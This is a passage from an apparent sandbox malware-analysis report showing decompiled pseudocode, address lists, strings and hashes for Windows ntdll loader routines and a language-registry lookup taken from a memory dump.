				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E014E934A() != 0) {
								_t159 = E0155A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x15c5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01555510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x15c5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E014E849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E014E8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E014E8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x15c5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x15c5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E014F2280(_t92, 0x15c86cc);
															_t94 = E015A9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E015061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x15c5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E014E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x15c5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x15c5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0151F380(_t136, 0x14b1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E014F2280(_t108, 0x15c86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E015061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E015A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E014EFFB0(_t118, _t156, 0x15c86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01519A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                        0x014e8799
                                                                        0x014e879d
                                                                        0x014e87a1
                                                                        0x014e87a3
                                                                        0x014e87a8
                                                                        0x014e87c3
                                                                        0x014e87c3
                                                                        0x014e87c8
                                                                        0x014e87d1
                                                                        0x014e87d4
                                                                        0x014e87d8
                                                                        0x014e87e5
                                                                        0x014e87ec
                                                                        0x01539bfe
                                                                        0x01539c00
                                                                        0x01539c02
                                                                        0x01539c08
                                                                        0x01539c0d
                                                                        0x01539c0f
                                                                        0x01539c14
                                                                        0x01539c2d
                                                                        0x01539c32
                                                                        0x01539c37
                                                                        0x01539c3a
                                                                        0x01539c3c
                                                                        0x01539c42
                                                                        0x01539c42
                                                                        0x01539c3c
                                                                        0x01539c02
                                                                        0x014e87da
                                                                        0x014e87df
                                                                        0x014e87e3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014e87e3
                                                                        0x014e87f2
                                                                        0x00000000
                                                                        0x014e87fb
                                                                        0x014e87fd
                                                                        0x014e87fe
                                                                        0x014e880e
                                                                        0x014e880f
                                                                        0x014e8810
                                                                        0x014e8814
                                                                        0x014e881a
                                                                        0x014e881c
                                                                        0x014e881f
                                                                        0x014e8821
                                                                        0x014e8822
                                                                        0x014e8824
                                                                        0x014e8826
                                                                        0x014e882c
                                                                        0x014e882e
                                                                        0x01539c48
                                                                        0x01539c48
                                                                        0x014e8834
                                                                        0x014e8834
                                                                        0x014e8837
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014e8837
                                                                        0x014e882e
                                                                        0x014e883d
                                                                        0x014e8840
                                                                        0x014e8843
                                                                        0x014e8846
                                                                        0x014e8849
                                                                        0x014e884c
                                                                        0x014e884e
                                                                        0x014e8850
                                                                        0x014e8852
                                                                        0x014e8854
                                                                        0x014e8857
                                                                        0x014e88b4
                                                                        0x014e88b6
                                                                        0x014e88b6
                                                                        0x014e8859
                                                                        0x014e8859
                                                                        0x014e8859
                                                                        0x014e8861
                                                                        0x014e8866
                                                                        0x014e886a
                                                                        0x014e893d
                                                                        0x014e8941
                                                                        0x00000000
                                                                        0x014e8947
                                                                        0x014e8947
                                                                        0x014e894a
                                                                        0x014e894c
                                                                        0x00000000
                                                                        0x014e8952
                                                                        0x014e8955
                                                                        0x014e895a
                                                                        0x014e895d
                                                                        0x014e895d
                                                                        0x014e895f
                                                                        0x014e8961
                                                                        0x014e8961
                                                                        0x014e8968
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014e896a
                                                                        0x014e896b
                                                                        0x014e896e
                                                                        0x00000000
                                                                        0x014e8970
                                                                        0x014e8970
                                                                        0x014e8970
                                                                        0x014e8970
                                                                        0x014e8972
                                                                        0x014e8972
                                                                        0x014e8974
                                                                        0x00000000
                                                                        0x014e897a
                                                                        0x014e897a
                                                                        0x014e897d
                                                                        0x00000000
                                                                        0x014e8983
                                                                        0x01539c65
                                                                        0x01539c6d
                                                                        0x01539c72
                                                                        0x01539c75
                                                                        0x01539c75
                                                                        0x01539c82
                                                                        0x01539c86
                                                                        0x01539c87
                                                                        0x01539c88
                                                                        0x01539c89
                                                                        0x01539c8c
                                                                        0x01539c90
                                                                        0x01539c95
                                                                        0x01539c97
                                                                        0x01539ca0
                                                                        0x01539ca3
                                                                        0x01539ca9
                                                                        0x01539ca9
                                                                        0x00000000
                                                                        0x01539ca9
                                                                        0x01539ca3
                                                                        0x00000000
                                                                        0x01539c97
                                                                        0x014e897d
                                                                        0x00000000
                                                                        0x014e8974
                                                                        0x014e8988
                                                                        0x014e8992
                                                                        0x014e8996
                                                                        0x00000000
                                                                        0x014e8996
                                                                        0x014e894c
                                                                        0x00000000
                                                                        0x014e8870
                                                                        0x014e887b
                                                                        0x014e887d
                                                                        0x014e887f
                                                                        0x014e8881
                                                                        0x014e8884
                                                                        0x014e8884
                                                                        0x014e8886
                                                                        0x014e8889
                                                                        0x014e888c
                                                                        0x014e888e
                                                                        0x014e8891
                                                                        0x014e8891
                                                                        0x014e8898
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014e889a
                                                                        0x014e889b
                                                                        0x014e889e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014e88a0
                                                                        0x014e88a8
                                                                        0x014e88b0
                                                                        0x014e88b2
                                                                        0x014e88d3
                                                                        0x014e88d5
                                                                        0x00000000
                                                                        0x014e88d7
                                                                        0x014e88db
                                                                        0x014e88dc
                                                                        0x014e88e0
                                                                        0x014e88e8
                                                                        0x014e88ee
                                                                        0x014e88f0
                                                                        0x014e88f3
                                                                        0x014e88fc
                                                                        0x014e8901
                                                                        0x014e8906
                                                                        0x014e890c
                                                                        0x014e890c
                                                                        0x014e890f
                                                                        0x014e8916
                                                                        0x014e8917
                                                                        0x014e8918
                                                                        0x014e8919
                                                                        0x014e891a
                                                                        0x014e891f
                                                                        0x014e8921
                                                                        0x01539c52
                                                                        0x01539c55
                                                                        0x01539c5b
                                                                        0x01539cac
                                                                        0x01539cc0
                                                                        0x01539cc0
                                                                        0x01539c55
                                                                        0x014e8927
                                                                        0x014e8927
                                                                        0x014e892f
                                                                        0x014e8933
                                                                        0x00000000
                                                                        0x014e88f5
                                                                        0x014e88f5
                                                                        0x00000000
                                                                        0x014e88f7
                                                                        0x014e88f7
                                                                        0x014e88fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014e88fa
                                                                        0x014e88f5
                                                                        0x014e88f3
                                                                        0x00000000
                                                                        0x014e88d5
                                                                        0x00000000
                                                                        0x014e88b2
                                                                        0x014e88c9
                                                                        0x00000000
                                                                        0x014e88c9
                                                                        0x014e887f
                                                                        0x014e886a
                                                                        0x014e8857
                                                                        0x014e8852
                                                                        0x014e88bf
                                                                        0x014e88bf
                                                                        0x014e87aa
                                                                        0x014e87ad
                                                                        0x014e87ae
                                                                        0x014e87b4
                                                                        0x014e87b5
                                                                        0x014e87b6
                                                                        0x014e87b8
                                                                        0x014e87bd
                                                                        0x014e87c1
                                                                        0x014e87f4
                                                                        0x014e87fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014e87c1
                                                                        0x00000000

                                                                        Strings
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01539C28
                                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01539C18
                                                                        • LdrpDoPostSnapWork, xrefs: 01539C1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 2994545307-1948996284
                                                                        • Opcode ID: d97c5c86424732ac9cc2e5739da8c850e87bac2a7c3d181038deb7e0b1d99851
                                                                        • Instruction ID: bff1b4d13eed1723518961b707faa74124819f31de85f69b670f9e444b3b354f
                                                                        • Opcode Fuzzy Hash: d97c5c86424732ac9cc2e5739da8c850e87bac2a7c3d181038deb7e0b1d99851
                                                                        • Instruction Fuzzy Hash: D4912271A0020B9FEF19CF99D8849BAB7F5FF94306B05416BDD01AB261E770E901CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014E7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E014E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E014ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E014DC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x15c5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01555510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x15c5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E014F7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E014F7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01557016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E014F7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E014F7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01557016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0150A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E014DB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                        0x014e7e4c
                                                                        0x014e7e50
                                                                        0x014e7e55
                                                                        0x014e7e58
                                                                        0x014e7e5d
                                                                        0x014e7e71
                                                                        0x014e7f33
                                                                        0x014e7e77
                                                                        0x014e7e77
                                                                        0x014e7e79
                                                                        0x014e7e79
                                                                        0x014e7e7e
                                                                        0x014e7f45
                                                                        0x01539848
                                                                        0x00000000
                                                                        0x01539848
                                                                        0x014e7f4e
                                                                        0x014e7f53
                                                                        0x014e7f5a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0153985a
                                                                        0x01539862
                                                                        0x01539866
                                                                        0x00000000
                                                                        0x0153986c
                                                                        0x00000000
                                                                        0x0153986c
                                                                        0x014e7e84
                                                                        0x014e7e84
                                                                        0x014e7e8d
                                                                        0x01539871
                                                                        0x014e7eb8
                                                                        0x014e7ec0
                                                                        0x014e7ec0
                                                                        0x014e7e9a
                                                                        0x0153987e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01539884
                                                                        0x0153988b
                                                                        0x015398a7
                                                                        0x015398ac
                                                                        0x015398b1
                                                                        0x015398b6
                                                                        0x015398b8
                                                                        0x015398b8
                                                                        0x015398b9
                                                                        0x00000000
                                                                        0x015398b9
                                                                        0x014e7ea0
                                                                        0x014e7ea7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014e7eac
                                                                        0x014e7eb1
                                                                        0x014e7ec6
                                                                        0x014e7ed0
                                                                        0x015398cc
                                                                        0x014e7ed6
                                                                        0x014e7ed6
                                                                        0x014e7ed6
                                                                        0x014e7ede
                                                                        0x014e7ee3
                                                                        0x015398e3
                                                                        0x015398f0
                                                                        0x01539902
                                                                        0x015398f2
                                                                        0x015398fb
                                                                        0x015398fb
                                                                        0x01539907
                                                                        0x0153991d
                                                                        0x0153991d
                                                                        0x01539907
                                                                        0x015398e3
                                                                        0x014e7ef0
                                                                        0x014e7f14
                                                                        0x014e7f14
                                                                        0x014e7f1e
                                                                        0x01539946
                                                                        0x014e7f24
                                                                        0x014e7f24
                                                                        0x014e7f24
                                                                        0x014e7f2c
                                                                        0x0153996a
                                                                        0x01539975
                                                                        0x01539975
                                                                        0x0153997e
                                                                        0x01539993
                                                                        0x01539993
                                                                        0x0153997e
                                                                        0x00000000
                                                                        0x014e7ef2
                                                                        0x014e7efc
                                                                        0x014e7f0a
                                                                        0x014e7f0e
                                                                        0x01539933
                                                                        0x00000000
                                                                        0x01539933
                                                                        0x00000000
                                                                        0x014e7f0e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014e7eb1

                                                                        Strings
                                                                        • LdrpCompleteMapModule, xrefs: 01539898
                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 015398A2
                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 01539891
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                        • API String ID: 0-1676968949
                                                                        • Opcode ID: f6eb87d8d560118bd7ac6c92bad98289b8bff0172156e8ebfbe6e8e34e7b28d6
                                                                        • Instruction ID: 78f9dfd6800d38b1585a10eb1406ad0ff68bf8c119c34e10368bea762ce112a8
                                                                        • Opcode Fuzzy Hash: f6eb87d8d560118bd7ac6c92bad98289b8bff0172156e8ebfbe6e8e34e7b28d6
                                                                        • Instruction Fuzzy Hash: 1F51D0716007469BEB21CB6CC988B6ABBE4FB80736F14059AE9519B3E1D774E901CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014DE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E014DE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E014DF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E015195D0();
						}
						if(_t78 != 0) {
							L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0151FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0151BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01519600();
					if(_t97 < 0) {
						goto L6;
					}
					E0151BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L014DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0151BB40(_t83, _t102 + 0x24, _t78);
								if(L014E43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0151BB40(_t84, _t102 + 0x24, _t94);
									if(L014E43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                        0x014de620
                                                                        0x014de628
                                                                        0x014de62f
                                                                        0x014de631
                                                                        0x014de635
                                                                        0x014de637
                                                                        0x014de63e
                                                                        0x01535503
                                                                        0x01535503
                                                                        0x014de64c
                                                                        0x014de64c
                                                                        0x014de651
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014de661
                                                                        0x014de665
                                                                        0x0153542a
                                                                        0x014de715
                                                                        0x014de71a
                                                                        0x014de71c
                                                                        0x014de720
                                                                        0x014de720
                                                                        0x014de727
                                                                        0x014de736
                                                                        0x014de736
                                                                        0x014de743
                                                                        0x014de743
                                                                        0x014de673
                                                                        0x014de678
                                                                        0x014de67d
                                                                        0x014de682
                                                                        0x014de685
                                                                        0x014de692
                                                                        0x014de69b
                                                                        0x014de6a3
                                                                        0x014de6ad
                                                                        0x014de6b1
                                                                        0x014de6b2
                                                                        0x014de6bb
                                                                        0x014de6bf
                                                                        0x014de6c0
                                                                        0x014de6c8
                                                                        0x014de6cc
                                                                        0x014de6d5
                                                                        0x014de6d9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014de6e5
                                                                        0x014de6ea
                                                                        0x014de6f9
                                                                        0x014de70b
                                                                        0x014de70f
                                                                        0x01535439
                                                                        0x0153545e
                                                                        0x0153545e
                                                                        0x00000000
                                                                        0x0153545e
                                                                        0x0153543b
                                                                        0x0153543e
                                                                        0x01535440
                                                                        0x01535445
                                                                        0x01535472
                                                                        0x01535475
                                                                        0x0153548d
                                                                        0x01535493
                                                                        0x015354a9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015354ab
                                                                        0x015354b4
                                                                        0x015354bc
                                                                        0x015354c8
                                                                        0x015354de
                                                                        0x015354fb
                                                                        0x015354e0
                                                                        0x015354e6
                                                                        0x015354eb
                                                                        0x015354eb
                                                                        0x015354de
                                                                        0x00000000
                                                                        0x015354bc
                                                                        0x01535477
                                                                        0x0153547a
                                                                        0x01535480
                                                                        0x01535483
                                                                        0x01535486
                                                                        0x0153548b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0153548b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01535447
                                                                        0x01535447
                                                                        0x01535447
                                                                        0x01535447
                                                                        0x0153544e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01535450
                                                                        0x01535452
                                                                        0x01535455
                                                                        0x0153545a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0153545c
                                                                        0x0153546a
                                                                        0x0153546d
                                                                        0x0153546f
                                                                        0x00000000
                                                                        0x0153546f
                                                                        0x014de70f

                                                                        Strings
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 014DE68C
                                                                        • InstallLanguageFallback, xrefs: 014DE6DB
                                                                        • @, xrefs: 014DE6C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                        • API String ID: 0-1757540487
                                                                        • Opcode ID: fd53f8a3ff7c6730e6b82e925e8d188c98876f669ed68578c31a50c8e7eae9cb
                                                                        • Instruction ID: aadf418b15a03e117bf4c3d5d5793f2da40c5d666d0b72d73447dac1d97d455b
                                                                        • Opcode Fuzzy Hash: fd53f8a3ff7c6730e6b82e925e8d188c98876f669ed68578c31a50c8e7eae9cb
                                                                        • Instruction Fuzzy Hash: 3D51D3726183069BDB25DF28C450A6FB7E8BFD8614F05092EF989EB250F735D904C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0159E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 60%
